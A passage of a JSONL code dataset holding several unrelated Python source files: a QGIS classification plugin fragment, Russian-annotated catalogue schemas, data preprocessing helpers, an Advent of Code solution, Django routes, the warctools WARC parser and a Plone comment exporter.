self.tr(\"aChor:Info\"),\n self.tr(\"Starting Main Script... Please wait for response\"), QMessageBox.Ok)\n proc = subprocess.Popen(shlex.split(cmd),shell=False,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)\n \n while True:\n out = proc.stdout.readline()\n if (str(out).strip() == \"b''\" or str(out).strip() == '') and proc.poll() is not None:\n break\n if not (str(out).strip() == '' or str(out).strip() == \"b''\"):\n print('info:'+str(out).strip())\n \n \n csvfile = strdir+'/achorbreaks.csv'\n \n rcsv = open(csvfile, 'r')\n sortedlist = sorted(rcsv, key= lambda x: float(x))\n \n i = 0\n \n ranges = []\n colorstr = []\n minval = achor_min_val\n while i < int(classnum)-1: \n colorstr.append(str(minval) + '_' + sortedlist[i].strip()) \n minval = round(float(sortedlist[i].strip()),4)\n logging.info('breaks:'+sortedlist[i])\n i += 1\n \n # create colorramps according to the amount of classes/breaks\n white_blue = self.create_colorrange(int(classnum), '#FFFFFF', '#3182bd') #default\n white_purple = self.create_colorrange(int(classnum), '#FFFFFF', '#756bb1')\n white_orange = self.create_colorrange(int(classnum), '#FFFFFF', '#e6550d')\n yellow_cyan_blue = self.create_colorrange(int(classnum), '#edf8b1', '#2c7fb8', '#7fcdbb')\n white_blue_green = self.create_colorrange(int(classnum), '#ece2f0', '#1c9099', '#a6bddb')\n white_pink_purple = self.create_colorrange(int(classnum), '#FFFFFF', 'c51b8a', 'fa9fb5')\n \n crange_selection = self.dlg.cBox.currentIndex() # get the selection from the gui\n \n # provide other options\n if crange_selection == 0:\n crange = white_blue\n elif crange_selection == 1:\n crange = white_purple\n elif crange_selection == 2:\n crange = white_orange \n elif crange_selection == 3:\n crange = yellow_cyan_blue\n elif crange_selection == 4:\n crange = white_blue_green\n elif crange_selection == 5:\n crange = white_pink_purple\n \n color_ranges = []\n for i in range(len(colorstr)-1):\n color_ranges.append((colorstr[i], float(colorstr[i].split('_')[0]), float(colorstr[i].split('_')[1]), crange[i]))\n if i == len(colorstr)-2:\n color_ranges.append((colorstr[i+1], float(colorstr[i+1].split('_')[0]), float(colorstr[i+1].split('_')[1]), crange[i+1]))\n color_ranges.append((colorstr[i+1].split(\"_\")[1] + \"_\" + str(achor_max_val), float(colorstr[i+1].split(\"_\")[1]), float(achor_max_val), crange[i+2]))\n \n # create a category for each item in attribute\n for label, lower, upper, color in color_ranges:\n symbol = QgsSymbol.defaultSymbol(myVectorLayer.geometryType())\n symbol.setColor(QColor(color))\n rng = QgsRendererRange(lower, upper, symbol, label)\n ranges.append(rng)\n \n # create the renderer and assign it to a layer\n expression = field # field name \n renderer = QgsGraduatedSymbolRenderer(expression, ranges)\n myVectorLayer.setRenderer(renderer)\n\n # load the layer with class breaks\n QgsProject.instance().addMapLayer(myVectorLayer)\n myVectorLayer.triggerRepaint()\n rcsv.close()\n # remove temporarily files\n os.remove(csvfile)\n if method == 4:\n filelist = [ f for f in os.listdir(strdir+\"/test/\") if f.startswith(\"hotspotshp\") ]\n for f in filelist:\n os.remove(os.path.join(strdir+\"/test/\", f))\n if method == 4 or method == 6:\n shutil.rmtree(self.plugin_dir+\"/test/inputpoint\")\n shutil.rmtree(self.plugin_dir+\"/tmp\")\n print(\"log: aChor Classification Success\")\n QMessageBox.information(self.dlg.show(), self.tr(\"aChor:Result\"),\n self.tr(\"aChor Classification Result Successful Loaded\"), QMessageBox.Ok)\n","repo_name":"Ariel505/aChor","sub_path":"aChor.py","file_name":"aChor.py","file_ext":"py","file_size_in_byte":41296,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"7388175417","text":"import typing\nfrom dataclasses import field\nfrom marshmallow.fields import Str, List, Nested\nfrom marshmallow_dataclass import dataclass\n\nfrom compel_shared import load_yml\nfrom compel_shared.conf import ConfigElement, i18nNamed\nfrom compel_shared.params.param import ParamRecog, ParamBase\nfrom compel_shared.schema import (\n DictField,\n MongoIDSchema,\n OrderedSchema,\n MultilangField,\n Samples)\n\n\n@dataclass(base_schema=OrderedSchema)\nclass NodePath:\n id: str = Str()\n name: str = Str(title='Название')\n\n\n@dataclass(base_schema=OrderedSchema)\nclass ClassAnalytic(ConfigElement):\n product_count: int = field(metadata=dict(\n allow_none=True,\n title=\"Продуктов в классе\",\n description=\"Количество продуктов привязанных к классу\",\n readonly=True\n ))\n\n\n@dataclass(base_schema=OrderedSchema)\nclass Tech(ConfigElement):\n m10: str = field(default=None,\n metadata=dict(\n enum_key='m10_tech',\n title='m10',\n description='Технологический тип для срочного производства модулей',\n allow_none=True,\n inheritable=True,\n ))\n ems: str = field(default=None,\n metadata=dict(\n enum_key='ems_tech',\n title='ems',\n description='Технологический тип для контрактного производства',\n allow_none=True,\n inheritable=True,\n ))\n\n\n@dataclass(base_schema=OrderedSchema)\nclass ClassParamAnalytic:\n product_count: int = field(default=0, metadata=dict(\n title='Продуктов',\n description='Количество продуктов с параметром',\n readonly=True))\n samples: Samples = None\n\n\n@dataclass(base_schema=OrderedSchema)\nclass ImportClassParamAnalytic(ClassParamAnalytic):\n samples: Samples = None\n\n\n@dataclass(base_schema=OrderedSchema)\nclass ClassParam(ParamBase):\n required: bool = field(\n metadata=dict(\n title='Обязательный параметр',\n description='''\n Значение влияет на развесовку и фильтрацию параметров при поиске.\n Обязательные параметры ищутся с особым весом, а также их полный набор \n может быть обязательным при поиске продуктов.\n '''\n ),\n default=False)\n\n displayed: bool = field(\n metadata=dict(\n title='Показывать в API',\n description='Если не отмечено, параметр не будет показываться в каталоге в контексте этого класса'\n ),\n default=True)\n\n # todo возможно, класс ClassParamAnalytic не нужен и стоит просто использовать ParamAnalytic\n # + вынести его в ParamBase\n analytic: ClassParamAnalytic = field(\n default=None,\n metadata=dict(\n title=\"Аналитика данных\",\n unwrap=True,\n readonly=True\n ))\n\n order: int = field(\n default=None,\n metadata=dict(\n allow_none=True,\n title='Порядок отображения',\n description='Порядок отображения параметра при отображении в catalog/api/params',\n unique=True\n )\n )\n\n\n@dataclass(base_schema=OrderedSchema)\nclass ImportClassParam:\n analytic: ImportClassParamAnalytic = field(default=None, metadata=dict(\n title=\"Аналитика данных\",\n unwrap=True,\n readonly=True))\n recog: ParamRecog = field(default=None, metadata=dict(\n title='Конфигурация распознавания', unwrap=True))\n target_id: str = field(default=None, metadata=dict(\n title='Параметр назначения',\n enum_key='target_params',\n as_tree_enum=True,\n description='''\n Параметр назначения куда будут складываться значения выделенные из данного параметра.\n \n Код параметра назначения автоматически добавляется ко всем макросам (`$N`, `$S` и т.д.) используемым в шаблонах.\n Если параметр назначения не указан, то коды параметров назначения должны быть прописаны в шаблонах полностью -\n например `$N_temperature_min`.\n '''\n ))\n\n\n@dataclass(base_schema=MongoIDSchema)\nclass Class(i18nNamed):\n id: str = field(\n default=None,\n metadata=dict(\n data_key='_id',\n title='Уникальный ID',\n is_hidden=True)\n )\n\n code: str = field(\n default=None,\n metadata=dict(\n allow_none=True,\n title='Код',\n description='Используется при формировании сигнатуры продуктов',\n unique=True)\n )\n legacy_id: int = field(\n default=None,\n metadata=dict(\n allow_none=True, title='Цифровой идентификатор класса', description='Цифровой идентификатор класса')\n )\n name: typing.Dict[str, str] = field(\n default_factory=dict,\n metadata=dict(\n marshmallow_field=MultilangField(\n title='Название',\n description='Локализоанное название класса в каталоге',\n required_on_create=True, ))\n )\n\n parent_id: str = field(\n default=None, metadata=dict(\n title='Родительский класс',\n allow_none=True,\n as_tree_enum=True,\n enum_key='class_tree_wo_current',\n is_hidden=True, )\n )\n\n axapta_id: str = field(\n default=None, metadata=dict(\n title='Axapta ID',\n description='Код раздела в Axapta',\n example='0403020101',\n is_hidden=True\n )\n )\n axapta_name: str = field(default=None, metadata=dict(\n title='axapta_name',\n description='Имя класса в Axapta',\n example='Конденсаторы керамические',\n is_hidden=True\n ))\n recognized: bool = field(\n default=False,\n metadata=dict(\n default=False,\n title='Распознается',\n description='Если не отмечено, параметры данного класса не будут использоваться при поиске продуктов')\n )\n\n is_leaf: bool = field(\n default=False\n )\n\n providers: typing.List[str] = field(\n default=None,\n metadata=dict(marshmallow_field=List(\n Str(enum_key='providers'),\n title='Приоритет источников',\n description='Список провайдеров, у которых берется класс, в порядке приоритета',\n allow_none=True,\n inheritable=True, ))\n )\n\n analytic: ClassAnalytic = field(\n default=None,\n metadata=dict(\n title=\"Аналитика данных\",\n allow_none=True,\n unwrap=True,\n readonly=True, )\n )\n\n tech: Tech = field(default=None, metadata=dict(\n title='Технологические типы',\n description='Технологические типы для срочного (m10) и контрактного (ems) производства модулей',\n example=dict(m10='CERCAP'),\n allow_none=True,\n unwrap=True,\n inheritable=True,\n ))\n\n params: typing.Dict[str, ClassParam] = field(\n default_factory=dict,\n metadata=dict(\n marshmallow_field=DictField(\n Nested(ClassParam.Schema),\n allow_none=True,\n title='Параметры класса',\n modifiable=True, ))\n )\n\n @staticmethod\n def load_defaults():\n data = load_yml(__file__, 'classes.yml')\n for k in data:\n data[k]['code'] = k\n return data\n\n\n@dataclass(base_schema=OrderedSchema)\nclass ClassImportAnalytic:\n product_count: int = field(metadata=dict(\n allow_none=True,\n title=\"Кол-во продуктов, привязанных к классу\",\n readonly=True,\n ))\n product_count_no_children: int = field(\n default=None,\n metadata=dict(\n allow_none=True,\n title=\"Кол-во продуктов, привязанных к классу без учета вложенности\",\n readonly=True,\n )\n )\n product_samples: typing.List[str] = field(\n default_factory=list, metadata=dict(is_hidden=True))\n\n\n@dataclass\nclass Candidate:\n id: str\n product_count: int\n\n\n@dataclass(base_schema=MongoIDSchema)\nclass ClassImport:\n\n id: str = field(\n metadata=dict(\n data_key='_id',\n title='Уникальный ID',\n is_hidden=True)\n )\n\n path: typing.List[NodePath] = field(\n default=None,\n metadata=dict(\n title='Путь в каталоге источника',\n is_hidden=True)\n )\n\n parent_id: str = field(\n default=None,\n metadata=dict(\n title='ID родительского класса',\n allow_none=True,\n is_hidden=True\n )\n )\n code: str = field(\n default=None,\n metadata=dict(\n allow_none=True, title='Код', description='Код класса', unique=True)\n )\n name: str = field(default=None, metadata=dict(\n title='Имя класса источника',\n description='Имя класса источника',\n example='USB Adapters',\n is_hidden=True\n ))\n provider: str = field(default=None, metadata=dict(\n title='Имя источника класса',\n description='Откуда пришел данный класс',\n example='farnell',\n required_on_create=True\n ))\n target_id: str = field(default=None, metadata=dict(\n title='Класс назначения',\n description='Класс к которому привязываются продукты из данного класса источника',\n as_tree_enum=True,\n enum_key='class_tree_with_candidates', )\n )\n\n is_bound: bool = field(\n default=False,\n metadata=dict(\n is_hidden=True)\n )\n\n candidates: typing.List[Candidate] = field(\n default_factory=list,\n metadata=dict(\n is_hidden=True)\n )\n\n params: typing.Dict[str, ImportClassParam] = field(\n default_factory=dict,\n metadata=dict(marshmallow_field=DictField(\n Nested(ImportClassParam.Schema),\n allow_none=True,\n title='Параметры класса',\n ))\n )\n # TODO: obsolete\n param_filter: typing.List[str] = field(\n default=None,\n metadata=dict(\n title='Допустимые параметры для класса',\n missing=None,\n is_hidden=True)\n )\n\n analytic: ClassImportAnalytic = field(\n default=None,\n metadata=dict(\n title=\"Аналитика данных\",\n allow_none=True,\n unwrap=True,\n readonly=True, )\n )\n","repo_name":"MikhailovaAnna/SanTelegramBot","sub_path":"venv/lib/python3.8/site-packages/compel_shared/classes/class_.py","file_name":"class_.py","file_ext":"py","file_size_in_byte":12173,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70260605320","text":"import numpy as np\nfrom scipy.linalg import svd\nfrom collections import Counter\nfrom copy import deepcopy\nfrom pdb import set_trace\n\ndef pca(X, n_components = 5):\n # Use svd to perform PCA on X\n # Inputs:\n # X: input matrix\n # n_components: number of principal components to keep\n # Output:\n # principal_components: the top n_components principal_components\n # X_pca = X.dot(principal_components)\n\n U, s, Vh = svd(X)\n\n principal_components = Vh.T[:,:n_components]\n return principal_components\n\ndef vector_norm(x, norm=\"Min-Max\"):\n # Calculate the normalized vector\n # Input x: 1-d np.array\n if norm == \"Min-Max\":\n min_norm_value = min(x)\n max_norm_value = max(x)\n x_norm = (x - min_norm_value) / (max_norm_value - min_norm_value)\n elif norm == \"L1\":\n for key in range(0,len(x)):\n sum_x = np.sum(abs(x[key]))\n x_norm = x / sum_x\n elif norm == \"L2\":\n for key in range(0,len(x)):\n sum_square = np.sum(x[key] ** 2)\n x_norm = x/np.sqrt(sum_square)\n elif norm == \"Standard_Score\":\n mean = np.mean(x)\n standard_deviation = np.std(x)\n x_norm = (x-mean)/standard_deviation\n else:\n raise Exception(\"Unknown normlization.\")\n return x_norm\n\ndef normalize(X, norm=\"Min-Max\", axis = 1):\n # Inputs:\n # X: input matrix\n # norm = {\"L1\", \"L2\", \"Min-Max\", \"Standard_Score\"}\n # axis = 0: normalize rows\n # axis = 1: normalize columns\n # Output:\n # X_norm: normalized matrix (numpy.array)\n\n X_norm = deepcopy(np.asarray(X))\n m, n = X_norm.shape\n if axis == 1:\n for col in range(n):\n X_norm[:,col] = vector_norm(X_norm[:,col], norm=norm)\n elif axis == 0:\n X_norm = np.array([vector_norm(X_norm[i], norm=norm) for i in range(m)])\n else:\n raise Exception(\"Unknown axis.\")\n return X_norm\n\ndef stratified_sampling(y, ratio, replace = True):\n # Inputs:\n # y: class labels\n # 0 < ratio < 1: number of samples = len(y) * ratio\n # replace = True: sample with replacement\n # replace = False: sample without replacement\n # Output:\n # sample: indices of stratified sampled points\n # (ratio is the same across each class,\n # samples for each class = int(np.ceil(ratio * # data in each class)) )\n\n samp = []\n if ratio<=0 or ratio>=1:\n raise Exception(\"ratio must be 0 < ratio < 1.\")\n y_array = np.asarray(y)\n # Write your own code below\n setosa = [index for index, label in enumerate(y_array) if label == \"Iris-setosa\"]\n vesicolor = [index for index, label in enumerate(y_array) if label == \"Iris-versicolor\"]\n verginca = [index for index, label in enumerate(y_array) if label == \"Iris-virginica\"]\n listed_together = [setosa,vesicolor,verginca]\n for value in range(0, len(listed_together)):\n size = int(np.ceil(ratio * len(listed_together[value])))\n samp.append(np.random.choice(listed_together[value],size,replace=replace))\n sample = np.concatenate((samp), axis=0)\n return sample","repo_name":"rj08-97/DSCI-633","sub_path":"assignments/assignment7/my_preprocess.py","file_name":"my_preprocess.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"72639370119","text":"import sys, os\nsys.path.append(os.path.abspath('../day 1'))\nfrom baseclass import Solution\n\n# imports required for solution:\nimport re\n\nclass Solution_Repo(Solution):\n\n def __init__(self):\n Solution.__init__(self)\n self.REPO_OWNER = \"brianbarbieri\"\n self.REPO_URL = \"https://github.com/brianbarbieri/adventofcode2020\"\n self.FILENAME = \"solutions/solution_1.py\"\n\n def part_1(self):\n with open(os.path.dirname(__file__) + \"/../input.txt\", \"r\") as r:\n data = [l.replace(\"\\n\", \"\").replace(\"bags\", \"bag\").replace(\"bag\", \"bags\") for l in r.readlines()]\n\n # first split input up in dict with bagcol(key) in bagcols(list of values)\n # start with splitting up on contain:\n data_c = [line.split(\" contain \") for line in data]\n bag_regex = r\"[0-9]+ ([a-z ]+)\"\n bag_dict = {}\n for bag in data_c:\n \n bags = re.findall(bag_regex, bag[-1])\n \n for bg in bags:\n if bg not in bag_dict:\n bag_dict[bg] = set()\n bag_dict[bg].add(bag[0])\n\n # now start with the \"shiny gold bags\" and iterate to see which bags to add\n found_bags = set()\n to_add = [\"shiny gold bags\"]\n while len(to_add) > 0:\n current_bag = to_add.pop()\n new_bags = bag_dict.get(current_bag)\n if new_bags is not None:\n for bag in new_bags:\n found_bags.add(bag)\n to_add += new_bags\n return len(found_bags)\n \n\n def part_2(self):\n with open(os.path.dirname(__file__) + \"/../input.txt\", \"r\") as r:\n data = [l.replace(\"\\n\", \"\").replace(\"bags\", \"bag\").replace(\"bag\", \"bags\") for l in r.readlines()] \n\n class Bag:\n def __init__(self, colour, value, multifactor, childeren):\n self.colour = colour\n self.value = value\n self.multifactor = multifactor\n self.childeren = childeren\n\n def __repr__(self):\n return str([self.colour, self.value, self.multifactor, self.childeren])\n\n def calculate_value(self):\n return self.value*self.multifactor\n\n data_c = [line.split(\" contain \") for line in data]\n bag_regex = r\"([0-9]+) ([a-z ]+)\"\n\n bag_dict = {}\n for bag in data_c:\n bags = re.findall(bag_regex, bag[-1])\n bag_dict[bag[0]] = bags\n \n score = -1\n bag_collection = [Bag(\"shiny gold bags\", 1, 1, bag_dict[\"shiny gold bags\"])]\n while len(bag_collection) > 0:\n current_bag = bag_collection.pop()\n score += current_bag.multifactor\n for child in current_bag.childeren:\n bag_collection.append(\n Bag(child[-1], int(child[0]), current_bag.multifactor*int(child[0]), bag_dict[child[-1]])\n )\n return score","repo_name":"brianbarbieri/Advent-of-code-speed-tests","sub_path":"2020/day 7/solutions/solution_1.py","file_name":"solution_1.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"13883691438","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom bloghome import views\nimport bloghome\n\nurlpatterns = [\n path('home/', views.home, name='home'),\n path('forum/', views.forum, name='forum'),\n path('human_right/', views.human_right, name='human_right'),\n path('anti_corruption/', views.anti_corruption, name='anti_corruption'),\n path('contact/', views.contact, name='contact'),\n path('centers/', views.centers, name='centers'),\n path('agent/', views.agent, name='agent'),\n path('technology/', views.technology, name='technology'),\n path('register/', views.register, name='register'),\n path('accounts/', include('django.contrib.auth.urls')),\n]","repo_name":"olukunleoson/Updated_blog","sub_path":"bloghome/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70882230600","text":"\"\"\"An object to represent warc records, using the abstract record in\nrecord.py\"\"\"\n\nimport re\nimport hashlib\nfrom hanzo.warctools.record import ArchiveRecord, ArchiveParser\nfrom hanzo.warctools.archive_detect import register_record_type\nimport uuid\n\nbad_lines = 5 # when to give up looking for the version stamp\n\n\n@ArchiveRecord.HEADERS(\n DATE=b'WARC-Date',\n TYPE=b'WARC-Type',\n ID=b'WARC-Record-ID',\n CONCURRENT_TO=b'WARC-Concurrent-To',\n REFERS_TO=b'WARC-Refers-To',\n REFERS_TO_TARGET_URI=b'WARC-Refers-To-Target-URI',\n REFERS_TO_DATE=b'WARC-Refers-To-Date',\n CONTENT_LENGTH=b'Content-Length',\n CONTENT_TYPE=b'Content-Type',\n URL=b'WARC-Target-URI',\n BLOCK_DIGEST=b'WARC-Block-Digest',\n PAYLOAD_DIGEST=b'WARC-Payload-Digest',\n IP_ADDRESS=b'WARC-IP-Address',\n FILENAME=b'WARC-Filename',\n WARCINFO_ID=b'WARC-Warcinfo-ID',\n PROFILE=b'WARC-Profile'\n)\nclass WarcRecord(ArchiveRecord):\n\n # Pylint is very bad at decorators, E1101 is the message that says\n # a member variable does not exist\n\n # pylint: disable-msg=E1101\n\n VERSION = b\"WARC/1.0\"\n VERSION18 = b\"WARC/0.18\"\n VERSION17 = b\"WARC/0.17\"\n RESPONSE = b\"response\"\n RESOURCE = b\"resource\"\n REQUEST = b\"request\"\n REVISIT = b\"revisit\"\n METADATA = b\"metadata\"\n CONVERSION = b\"conversion\"\n WARCINFO = b\"warcinfo\"\n\n PROFILE_IDENTICAL_PAYLOAD_DIGEST = b\"http://netpreserve.org/warc/1.0/revisit/identical-payload-digest\"\n\n TRAILER = b'\\r\\n\\r\\n'\n\n def __init__(self, version=VERSION, headers=None, content=None,\n errors=None, content_file=None):\n \"\"\"\n WarcRecord constructor.\n\n Either content or content_file must be provided, but not both. If\n content, which is a tuple (content_type, content_buffer), is provided,\n when writing the warc record, any Content-Type and Content-Length that\n appear in the supplied headers are ignored, and the values content[0]\n and len(content[1]), respectively, are used. \n\n When reading, the caller can stream content_file or use content, which is\n lazily filled using content_file, and after which content_file is\n unavailable.\n \"\"\"\n ArchiveRecord.__init__(self, headers, content, errors)\n self.version = version\n self.content_file = content_file\n\n @property\n def id(self):\n return self.get_header(self.ID)\n\n def _write_to(self, out, nl):\n \"\"\"WARC Format:\n VERSION NL\n (Key: Value NL)*\n NL\n CONTENT NL\n NL\n\n don't write multi line headers\n \"\"\"\n out.write(self.version)\n out.write(nl)\n for k, v in self.headers:\n if self.content_file is not None or k not in (self.CONTENT_TYPE, self.CONTENT_LENGTH):\n out.write(k)\n out.write(b\": \")\n out.write(v)\n out.write(nl)\n\n if self.content_file is not None:\n out.write(nl) # end of header blank nl\n while True:\n buf = self.content_file.read(8192)\n if buf == b'': break\n out.write(buf)\n else:\n # if content tuple is provided, set Content-Type and\n # Content-Length based on the values in the tuple\n content_type, content_buffer = self.content\n\n if content_type:\n out.write(self.CONTENT_TYPE)\n out.write(b\": \")\n out.write(content_type)\n out.write(nl)\n if content_buffer is None:\n content_buffer = b\"\"\n\n content_length = len(content_buffer)\n out.write(self.CONTENT_LENGTH)\n out.write(b\": \")\n out.write(str(content_length).encode('ascii'))\n out.write(nl)\n\n out.write(nl) # end of header blank nl\n if content_buffer:\n out.write(content_buffer)\n \n # end of record nl nl\n out.write(nl)\n out.write(nl)\n out.flush()\n\n def repair(self):\n pass\n\n def validate(self):\n return self.errors\n\n @classmethod\n def make_parser(self):\n return WarcParser()\n\n def block_digest(self, content_buffer):\n block_hash = hashlib.sha256()\n block_hash.update(content_buffer)\n\n digest = \"sha256:%s\" % block_hash.hexdigest()\n return digest\n\n @staticmethod\n def warc_uuid(text):\n return \"\".format(uuid.UUID(hashlib.sha1(text).hexdigest()[0:32])).encode('ascii')\n\n @staticmethod\n def random_warc_uuid():\n return \"\".format(uuid.uuid4()).encode('ascii')\n\n\ndef rx(pat):\n \"\"\"Helper to compile regexps with IGNORECASE option set.\"\"\"\n return re.compile(pat, flags=re.IGNORECASE)\n\nversion_rx = rx(br'^(?P.*?)(?P\\s*WARC/(?P.*?))'\n b'(?P\\r\\n|\\r|\\n)\\\\Z')\n# a header is key: value plus any following lines with leading whitespace\nheader_rx = rx(br'^(?P.*?):\\s?(?P.*?)' b'(?P\\r\\n|\\r|\\n)\\\\Z')\nvalue_rx = rx(br'^\\s+(?P.+?)' b'(?P\\r\\n|\\r|\\n)\\\\Z')\nnl_rx = rx(b'^(?P\\r\\n|\\r|\\n\\\\Z)')\nlength_rx = rx(b'^' + WarcRecord.CONTENT_LENGTH + b'$' ) # pylint: disable-msg=E1101\ntype_rx = rx(b'^' + WarcRecord.CONTENT_TYPE + b'$') # pylint: disable-msg=E1101\n\nrequired_headers = set((\n WarcRecord.TYPE.lower(), # pylint: disable-msg=E1101\n WarcRecord.ID.lower(), # pylint: disable-msg=E1101\n WarcRecord.CONTENT_LENGTH.lower(), # pylint: disable-msg=E1101\n WarcRecord.DATE.lower(), # pylint: disable-msg=E1101\n ))\n\n\nclass WarcParser(ArchiveParser):\n KNOWN_VERSIONS = set((b'1.0', b'0.17', b'0.18'))\n\n def parse(self, stream, offset, line=None):\n \"\"\"Reads a warc record from the stream, returns a tuple\n (record, errors). Either records is null or errors is\n null. Any record-specific errors are contained in the record -\n errors is only used when *nothing* could be parsed\"\"\"\n # pylint: disable-msg=E1101\n errors = []\n version = None\n # find WARC/.*\n if line is None:\n line = stream.readline()\n\n while line:\n match = version_rx.match(line)\n\n if match:\n version = match.group('version')\n if offset is not None:\n offset += len(match.group('prefix'))\n break\n else:\n if offset is not None:\n offset += len(line)\n if not nl_rx.match(line):\n errors.append(('ignored line', line))\n if len(errors) > bad_lines:\n errors.append(('too many errors, giving up hope',))\n return (None, errors, offset)\n line = stream.readline()\n if not line:\n if version:\n errors.append(('warc version but no headers', version))\n return (None, errors, offset)\n if line:\n content_length = 0\n content_type = None\n\n record = WarcRecord(errors=errors, version=version)\n\n if match.group('nl') != b'\\x0d\\x0a':\n record.error('incorrect newline in version', match.group('nl'))\n\n if match.group('number') not in self.KNOWN_VERSIONS:\n record.error('version field is not known (%s)'\n % (\",\".join(self.KNOWN_VERSIONS)),\n match.group('number'))\n\n prefix = match.group('prefix')\n\n if prefix:\n record.error('bad prefix on WARC version header', prefix)\n\n #Read headers\n line = stream.readline()\n while line and not nl_rx.match(line):\n\n #print 'header', repr(line)\n match = header_rx.match(line)\n if match:\n if match.group('nl') != b'\\x0d\\x0a':\n record.error('incorrect newline in header',\n match.group('nl'))\n name = match.group('name').strip()\n value = [match.group('value').strip()]\n #print 'match',name, value\n\n line = stream.readline()\n match = value_rx.match(line)\n while match:\n #print 'follow', repr(line)\n if match.group('nl') != b'\\x0d\\x0a':\n record.error('incorrect newline in follow header',\n line, match.group('nl'))\n value.append(match.group('value').strip())\n line = stream.readline()\n match = value_rx.match(line)\n\n value = b\" \".join(value)\n\n record.headers.append((name, value))\n\n if type_rx.match(name):\n if value:\n content_type = value\n else:\n record.error('invalid header', name, value)\n elif length_rx.match(name):\n try:\n #print name, value\n content_length = int(value)\n #print content_length\n except ValueError:\n record.error('invalid header', name, value)\n\n # have read blank line following headers\n\n record.content_file = stream\n record.content_file.bytes_to_eoc = content_length\n\n # check mandatory headers \n # WARC-Type WARC-Date WARC-Record-ID Content-Length\n\n return (record, (), offset)\n\n\nblank_rx = rx(br'^$')\nregister_record_type(version_rx, WarcRecord)\nregister_record_type(blank_rx, WarcRecord)\n\n\ndef make_response(id, date, url, content, request_id):\n # pylint: disable-msg=E1101\n headers = [\n (WarcRecord.TYPE, WarcRecord.RESPONSE),\n (WarcRecord.ID, id),\n (WarcRecord.DATE, date),\n (WarcRecord.URL, url),\n\n ]\n if request_id:\n headers.append((WarcRecord.CONCURRENT_TO, request_id))\n\n record = WarcRecord(headers=headers, content=content)\n\n return record\n\n\ndef make_request(request_id, date, url, content, response_id):\n # pylint: disable-msg=E1101\n headers = [\n (WarcRecord.TYPE, WarcRecord.REQUEST),\n (WarcRecord.ID, request_id),\n (WarcRecord.DATE, date),\n (WarcRecord.URL, url),\n\n ]\n if response_id:\n headers.append((WarcRecord.CONCURRENT_TO, response_id))\n\n record = WarcRecord(headers=headers, content=content)\n\n return record\n\n\ndef make_metadata(meta_id, date, content, concurrent_to=None, url=None):\n # pylint: disable-msg=E1101\n headers = [\n (WarcRecord.TYPE, WarcRecord.METADATA),\n (WarcRecord.ID, meta_id),\n (WarcRecord.DATE, date),\n\n ]\n if concurrent_to:\n headers.append((WarcRecord.CONCURRENT_TO, concurrent_to))\n\n if url:\n headers.append((WarcRecord.URL, url))\n\n record = WarcRecord(headers=headers, content=content)\n\n return record\n\n\ndef make_conversion(conv_id, date, content, refers_to=None, url=None):\n # pylint: disable-msg=E1101\n headers = [\n (WarcRecord.TYPE, WarcRecord.CONVERSION),\n (WarcRecord.ID, conv_id),\n (WarcRecord.DATE, date),\n\n ]\n if refers_to:\n headers.append((WarcRecord.REFERS_TO, refers_to))\n\n if url:\n headers.append((WarcRecord.URL, url))\n\n record = WarcRecord(headers=headers, content=content)\n\n return record\n\n\ndef warc_datetime_str(d):\n s = d.isoformat()\n if '.' in s:\n s = s[:s.find('.')]\n return (s + 'Z').encode('utf-8')\n","repo_name":"internetarchive/warctools","sub_path":"hanzo/warctools/warc.py","file_name":"warc.py","file_ext":"py","file_size_in_byte":11905,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"63"} +{"seq_id":"86681399120","text":"# -*- coding: utf-8 -*-\nfrom DateTime import DateTime\nfrom plone.app.discussion.interfaces import IConversation\nfrom redturtle.exporter.base.interfaces import ICustomDataExporter\nfrom zope.component import adapter\nfrom zope.interface import implementer\nfrom zope.interface import Interface\n\n\n@adapter(Interface, Interface)\n@implementer(ICustomDataExporter)\nclass DiscussionsExporter(object):\n order = 2\n\n def __init__(self, context, request):\n self.context = context\n self.request = request\n\n def __call__(self):\n \"\"\"\n \"\"\"\n conversation = IConversation(self.context)\n comments = conversation.getComments()\n comments = [comment for comment in comments]\n tmp_lst = []\n for item in comments:\n tmp_dict = item.__dict__\n if not tmp_dict.get(\"status\"):\n states = list(tmp_dict[\"workflow_history\"].values())\n comment_status = states[0][-1][\"review_state\"]\n try:\n del tmp_dict[\"__parent__\"]\n del tmp_dict[\"workflow_history\"]\n except Exception:\n pass\n tmp_dict[\"modification_date\"] = (\n DateTime(tmp_dict[\"modification_date\"])\n .asdatetime()\n .isoformat()\n )\n tmp_dict[\"creation_date\"] = (\n DateTime(tmp_dict[\"creation_date\"]).asdatetime().isoformat()\n )\n if not tmp_dict.get(\"status\"):\n tmp_dict.update({\"status\": comment_status})\n tmp_lst.append(tmp_dict)\n return {\"discussions\": tmp_lst}\n","repo_name":"RedTurtle/redturtle.exporter.base","sub_path":"src/redturtle/exporter/base/adapters/discussions.py","file_name":"discussions.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"31919627805","text":"\nfrom hobo.preprocess import *\nfrom hobo.collect import *\n\ndef preprocess_one_hobo(hobo_file, output_path):\n hd = HoboDataFrame(hobo_file)\n hd.preprocess()\n hd.output_df(output_path)\n\ndef collect_one_profile(uid, profile, output_folder):\n hdt = HoboTester(uid, profile)\n hdt.collect_one_person_all_days()\n hdt.output_collected_data(output_folder)","repo_name":"chengxiangduan-usc/mecsc","sub_path":"final_test/data/hobo/hobo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40285554551","text":"import sys\n\nn, m = map(int, sys.stdin.readline().split())\nroads = [tuple(map(int, sys.stdin.readline().split())) for _ in 